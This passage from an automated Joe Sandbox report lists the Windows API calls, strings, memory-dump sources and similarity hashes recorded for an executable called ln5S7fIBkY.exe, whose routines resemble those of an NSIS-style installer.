                                                                    • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,0040607E,?,?), ref: 00405F1E
                                                                    • GetShortPathNameW.KERNEL32(?,007A55C0,00000400), ref: 00405F27
                                                                      • Part of subcall function 00405CF2: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FD7,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D02
                                                                      • Part of subcall function 00405CF2: lstrlenA.KERNEL32(00000000,?,00000000,00405FD7,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D34
                                                                    • GetShortPathNameW.KERNEL32(?,007A5DC0,00000400), ref: 00405F44
                                                                    • wsprintfA.USER32 ref: 00405F62
                                                                    • GetFileSize.KERNEL32(00000000,00000000,007A5DC0,C0000000,00000004,007A5DC0,?,?,?,?,?), ref: 00405F9D
                                                                    • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405FAC
                                                                    • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FE4
                                                                    • SetFilePointer.KERNEL32(0040A560,00000000,00000000,00000000,00000000,007A51C0,00000000,-0000000A,0040A560,00000000,[Rename],00000000,00000000,00000000), ref: 0040603A
                                                                    • GlobalFree.KERNEL32(00000000), ref: 0040604B
                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406052
                                                                      • Part of subcall function 00405D8D: GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\ln5S7fIBkY.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D91
                                                                      • Part of subcall function 00405D8D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DB3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd
                                                                    Similarity
                                                                    • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                    • String ID: %ls=%ls$[Rename]
                                                                    • API String ID: 2171350718-461813615
                                                                    • Opcode ID: 210d5d9a443b3001b4c7cda13cc78adcf358d44dd1d7e4f25ad0eda9c69d4b7c
                                                                    • Instruction ID: 42876e8bd8e74e9ce15c52ab3024c97c29192655820983ae090f8c600f4dcad6
                                                                    • Opcode Fuzzy Hash: 210d5d9a443b3001b4c7cda13cc78adcf358d44dd1d7e4f25ad0eda9c69d4b7c
                                                                    • Instruction Fuzzy Hash: 25312530240B156BD220BB218D48F6B3A9DEF86744F15003AFA42F62D1EA7DD8148ABD
                                                                    APIs
                                                                    • CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\ln5S7fIBkY.exe",00403347,C:\Users\user\AppData\Local\Temp\,76F93420,004035B6,?,00000006,00000008,0000000A), ref: 0040658E
                                                                    • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 0040659D
                                                                    • CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\ln5S7fIBkY.exe",00403347,C:\Users\user\AppData\Local\Temp\,76F93420,004035B6,?,00000006,00000008,0000000A), ref: 004065A2
                                                                    • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\ln5S7fIBkY.exe",00403347,C:\Users\user\AppData\Local\Temp\,76F93420,004035B6,?,00000006,00000008,0000000A), ref: 004065B5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd
                                                                    Similarity
                                                                    • API ID: Char$Next$Prev
                                                                    • String ID: "C:\Users\user\Desktop\ln5S7fIBkY.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                    • API String ID: 589700163-3649173787
                                                                    • Opcode ID: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
                                                                    • Instruction ID: 354a4add7e9ac5ce680480da4fd3ed99b8030fd96c8c1ffbe99f836226306b46
                                                                    • Opcode Fuzzy Hash: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
                                                                    • Instruction Fuzzy Hash: 4511B655800612A5DF303B14AD44A7772F8EF547A0F56443FE985733C4E77C5C9286AD
                                                                    APIs
                                                                    • GetWindowLongW.USER32(?,000000EB), ref: 00404292
                                                                    • GetSysColor.USER32(00000000), ref: 004042D0
                                                                    • SetTextColor.GDI32(?,00000000), ref: 004042DC
                                                                    • SetBkMode.GDI32(?,?), ref: 004042E8
                                                                    • GetSysColor.USER32(?), ref: 004042FB
                                                                    • SetBkColor.GDI32(?,?), ref: 0040430B
                                                                    • DeleteObject.GDI32(?), ref: 00404325
                                                                    • CreateBrushIndirect.GDI32(?), ref: 0040432F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd
                                                                    Similarity
                                                                    • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                    • String ID:
                                                                    • API String ID: 2320649405-0
                                                                    • Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                    • Instruction ID: 595a5ac3551c8926a474018cd00e052a0643935c19338169816fcf7950983a94
                                                                    • Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                    • Instruction Fuzzy Hash: BD2135716007049FCB219F68DD48B5BBBF8AF81715B048A3EED96A26E0D734E944CB54
                                                                    APIs
                                                                    • ReadFile.KERNEL32(?,?,?,?), ref: 004026B6
                                                                    • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026F1
                                                                    • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402714
                                                                    • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040272A
                                                                      • Part of subcall function 00405E6E: SetFilePointer.KERNEL32(?,00000000,00000000,00000001,?,00000000,?,?,0040262F,00000000,00000000,?,00000000,00000011), ref: 00405E84
                                                                    • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D6
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd
                                                                    Similarity
                                                                    • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                    • String ID: 9
                                                                    • API String ID: 163830602-2366072709
                                                                    • Opcode ID: d48387ae3e024a72c6243637e6df33ec40d1b18911dabf8db30d8cce87806c70
                                                                    • Instruction ID: 60624729709df044e3b9a276a2138f1bd207bb457e97f94edfd4483e5cf9eee0
                                                                    • Opcode Fuzzy Hash: d48387ae3e024a72c6243637e6df33ec40d1b18911dabf8db30d8cce87806c70
                                                                    • Instruction Fuzzy Hash: 61510974D10219AEDF219F95DA88AAEB779FF04304F50443BE901F72D0DBB89982CB58
                                                                    APIs
                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404BE4
                                                                    • GetMessagePos.USER32 ref: 00404BEC
                                                                    • ScreenToClient.USER32(?,?), ref: 00404C06
                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404C18
                                                                    • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404C3E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd
                                                                    Similarity
                                                                    • API ID: Message$Send$ClientScreen
                                                                    • String ID: f
                                                                    • API String ID: 41195575-1993550816
                                                                    • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                    • Instruction ID: e2d68be7770c43893e1e2478522bb0d44a2fa382b0b36792216c84cf33d7cb12
                                                                    • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                    • Instruction Fuzzy Hash: 6F015E71D00218BAEB00DB94DD85BFFBBBCAF95B11F10412BBA51B61D0C7B49A018BA4
                                                                    APIs
                                                                    • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E11
                                                                    • MulDiv.KERNEL32(000A5018,00000064,000A5A08), ref: 00402E3C
                                                                    • wsprintfW.USER32 ref: 00402E4C
                                                                    • SetWindowTextW.USER32(?,?), ref: 00402E5C
                                                                    • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E6E
                                                                    Strings
                                                                    • verifying installer: %d%%, xrefs: 00402E46
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd
                                                                    Similarity
                                                                    • API ID: Text$ItemTimerWindowwsprintf
                                                                    • String ID: verifying installer: %d%%
                                                                    • API String ID: 1451636040-82062127
                                                                    • Opcode ID: 1a328351c5421bd6383489faae0abdae529a3cf17d73acb180239156b2535a4a
                                                                    • Instruction ID: 3b7df5e00b9d055b55134e233a6447c2e1405f162d6c23549fa63679cea1b34f
                                                                    • Opcode Fuzzy Hash: 1a328351c5421bd6383489faae0abdae529a3cf17d73acb180239156b2535a4a
                                                                    • Instruction Fuzzy Hash: 5601677164020CBFDF109F50DD49FAE3B69AB04305F108439FA05B51E0DBB98555CF58
                                                                    APIs
                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402901
                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040291D
                                                                    • GlobalFree.KERNEL32(?), ref: 00402956
                                                                    • GlobalFree.KERNEL32(00000000), ref: 00402969
                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402981
                                                                    • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402995
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd
                                                                    Similarity
                                                                    • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                    • String ID:
                                                                    • API String ID: 2667972263-0
                                                                    • Opcode ID: 4c7fd7b1f91375a2558ff4a0a047554b9ac13023ec1a621a7b7447f5a49afdce
                                                                    • Instruction ID: 9b62f472eb3a95df078ad497759be9c31f6c15c11f60cf08f6005a6c9cb4e6e4
                                                                    • Opcode Fuzzy Hash: 4c7fd7b1f91375a2558ff4a0a047554b9ac13023ec1a621a7b7447f5a49afdce
                                                                    • Instruction Fuzzy Hash: 9921BFB1C00128BBCF116FA5DE49D9E7E79EF09364F14423AF960762E0CB794C419B98
                                                                    APIs
                                                                    • GetDC.USER32(?), ref: 00401DBC
                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
                                                                    • MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
                                                                    • ReleaseDC.USER32(?,00000000), ref: 00401DEF
                                                                    • CreateFontIndirectW.GDI32(0040CDA8), ref: 00401E3E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd
                                                                    Similarity
                                                                    • API ID: CapsCreateDeviceFontIndirectRelease
                                                                    • String ID:
                                                                    • API String ID: 3808545654-0
                                                                    • Opcode ID: 5bd6bd5a0da59a8b862859853f94caf732d3d6ef064c8fd9610db6583930af4a
                                                                    • Instruction ID: 8812a6a15301a194985102fbed33e50eefbd915e65da34b8167a76c641a3bf07
                                                                    • Opcode Fuzzy Hash: 5bd6bd5a0da59a8b862859853f94caf732d3d6ef064c8fd9610db6583930af4a
                                                                    • Instruction Fuzzy Hash: 1B017571948240EFE7406BB4AF8A7D97FB49F95301F10457EE241B71E2CA7804459F2D
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,?), ref: 00401D63
                                                                    • GetClientRect.USER32(00000000,?), ref: 00401D70
                                                                    • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
                                                                    • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
                                                                    • DeleteObject.GDI32(00000000), ref: 00401DAE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd
                                                                    Similarity
                                                                    • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                    • String ID:
                                                                    • API String ID: 1849352358-0
                                                                    • Opcode ID: af37ea9ba388a84de559cbd8ec297e57ada735495d371533b97794bde5efee3a
                                                                    • Instruction ID: 7e4da700d615158f321032e6dee441e0afa22e46251462cde10931eea5e4b44d
                                                                    • Opcode Fuzzy Hash: af37ea9ba388a84de559cbd8ec297e57ada735495d371533b97794bde5efee3a
